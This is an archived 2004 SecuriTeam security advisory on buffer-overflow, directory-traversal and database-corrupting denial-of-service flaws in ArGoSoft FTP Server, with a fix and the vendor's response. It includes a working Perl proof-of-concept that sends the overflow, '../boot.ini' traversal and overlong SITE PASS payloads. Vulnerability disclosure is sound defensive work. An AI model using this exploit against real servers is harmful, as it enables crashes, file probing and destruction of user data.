[NT] ArGoSoft FTP Server Multiple Vulnerabilities (SITE ZIP, UNZIP, COPY, PASS)

From: SecuriTeam (support_at_securiteam.com)
Date: 03/02/04

  • Next message: SecuriTeam: "[EXPL] Serv-U MDTM Command Remote Vulnerability Exploit"
    To: list@securiteam.com
    Date: 2 Mar 2004 18:23:44 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      ArGoSoft FTP Server Multiple Vulnerabilities (SITE ZIP, UNZIP, COPY, PASS)
    ------------------------------------------------------------------------

    SUMMARY

    STORM has discovered multiple security vulnerabilities in
    <http://www.argosoft.com/applications/ftpserver/> ArGoSoft's FTP Server:

    1) Three allow overflowing an internal buffer - Buffer Overflows

    2) One allows discovering whether a file exist on a server (files that
    reside outside the bound FTP root directory) - File Disclosure

    3) Another one allows causing a DoS by overwriting critical parts of the
    user database file (by the password change mechanism) in such a way that
    the user database is no longer useable - Denial of Service

    DETAILS

    Vulnerable Systems:
     * ArGoSoft version 1.4.1.4 and prior
     * ArGoSoft version 1.4.1.5

    Immune Systems:
     * ArGoSoft version 1.4.1.6

    Buffer Overflows:
    The first two vulnerabilities revolve the use of the SITE ZIP command, the
    parameters of that command are not checked for their length, causing the
    program to overflow the internal buffer used by the command. The first one
    can be caused by sending "SITE ZIP Ax512" (x512 = write the "A" character
    512 times), the second one can be caused by sending "SITE ZIP storm.zip
    /f:Ax2048". The next vulnerability that causes a buffer overflow is caused
    by using the command "SITE COPY", to recreate this send "SITE COPY Ax2048
    Ax10".

    File Disclosure:
    The file disclosure vulnerability is caused by the "SITE UNZIP" command,
    the parameter given to the SITE UNZIP command is the file it should unzip,
    as the file can contain "../" (i.e. it is not filtered), files that reside
    outside the FTP root directory can be verified for their existence (this
    is done by comparing the response for ../boot.ini and ../notthere.ini).

    Denial of Service:
    The denial of service vulnerability is caused by the "SITE PASS" command,
    this command receives as a second parameter the new password you are
    interested in using, if you give it a password that is very long, the user
    database will become corrupt and unusable.

    Solution:
    Upgrade to the latest version of ArGoSoft FTP Server.

    Vendor response:
    The vendor was very responsive and quick to fix the issue (within the
    first 48 hours), the newest version should fix the above vulnerabilities.
    The new version is available from the vendor's web site.

    Exploit (for all the vulnerabilities):
    #!/usr/bin/perl
    # Multiple Vulnerabilities in ArGoSoft FTP Server version 1.4 (1.4.1.4)
    # Created by Beyond Security Ltd. - All rights reserved.

    use IO::Socket;

    $host = "192.168.1.243";

    $remote = IO::Socket::INET->new ( Proto => "tcp",
         PeerAddr => $host,
         PeerPort => "2119",,
        );

    unless ($remote) { die "cannot connect to ftp daemon on $host" }

    print "connected\n";
    while (<$remote>)
    {
     print $_;
     if (/220 /)
     {
      last;
     }
    }

    $remote->autoflush(1);

    my $ftp = "USER username\r\n";

    print $remote $ftp;
    print $ftp;
    sleep(1);

    while (<$remote>)
    {
     print $_;
     if (/331 /)
     {
      last;
     }
    }

    $ftp = join("", "PASS ", "password", "\r\n");
    print $remote $ftp;
    print $ftp;
    sleep(1);

    while (<$remote>)
    {
     print $_;
     if (/230 /)
     {
      last;
     }
    }

    #$ftp = join ("", "SITE ZIP ", "A"x512, "\r\n");
    #$ftp = join ("", "SITE ZIP storm.zip /f:", "A"x2048, "\r\n");
    #$ftp = join ("", "SITE COPY ", "A"x2048, " ", "A"x10, "\r\n");
    #$ftp = join ("", "SITE UNZIP ", "../boot.ini\r\n"); # Directory Traversal
    (we know a certain file exists)
    #$ftp = join ("", "SITE PASS ", "storm ", "A"x3500, "\r\n"); # DoS ...
    against the user database

    #Choose one of the above to test the vulnerabilities mentioned

    print $remote $ftp;
    print $ftp;
    sleep(1);

    while (<$remote>)
    {
     print $_;
     if (/250 Done/)
     {
      last;
     }
    }

    close $remote;

    ADDITIONAL INFORMATION

    SecurITeam would like to thank <mailto:storm@securiteam.com> STORM for
    finding this vulnerability.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[EXPL] Serv-U MDTM Command Remote Vulnerability Exploit"

    Relevant Pages

    • [NT] BlackJumboDog FTP Server Buffer Overflow
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... SapporoWorks BlackJumboDog is an integrated open-source proxy server, ... BlackJumboDog version 3.6.1 is vulnerable to a buffer overflow in its FTP ... suppose that the user's FTP client issues the following command. ...
      (Securiteam)
    • [Full-Disclosure] 3Com 3CDaemon Multiple Vulnerabilities
      ... 3CDaemon is a free popular TFTP, FTP, and Syslog daemon for Microsoft Windows ... Remote exploitation of Multiple vulnerabilities in the 3CDaemon allows ... Connection closed by remote host. ... 4.Multiple FTP command long parameter Buffer overflow ...
      (Full-Disclosure)
    • 3Com 3CDaemon Multiple Vulnerabilities
      ... 3CDaemon is a free popular TFTP, FTP, and Syslog daemon for Microsoft Windows ... Remote exploitation of Multiple vulnerabilities in the 3CDaemon allows ... Connection closed by remote host. ... 4.Multiple FTP command long parameter Buffer overflow ...
      (Full-Disclosure)
    • 3Com 3CDaemon Multiple Vulnerabilities
      ... 3CDaemon is a free popular TFTP, FTP, and Syslog daemon for Microsoft Windows ... Remote exploitation of Multiple vulnerabilities in the 3CDaemon allows ... Connection closed by remote host. ... 4.Multiple FTP command long parameter Buffer overflow ...
      (Bugtraq)
    • [NT] CA ARCServe Backup for Laptops and Desktops Multiple Buffer Overflow Vulnerabilities
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... CA ARCServe Backup for Laptops and Desktops Multiple Buffer Overflow ... Remote exploitation of multiple buffer overflow vulnerabilities in ... rxsGetSubDirs, rxsGetServerDBPathName, rxsSetServerOptions, rxsDeleteFile, ...
      (Securiteam)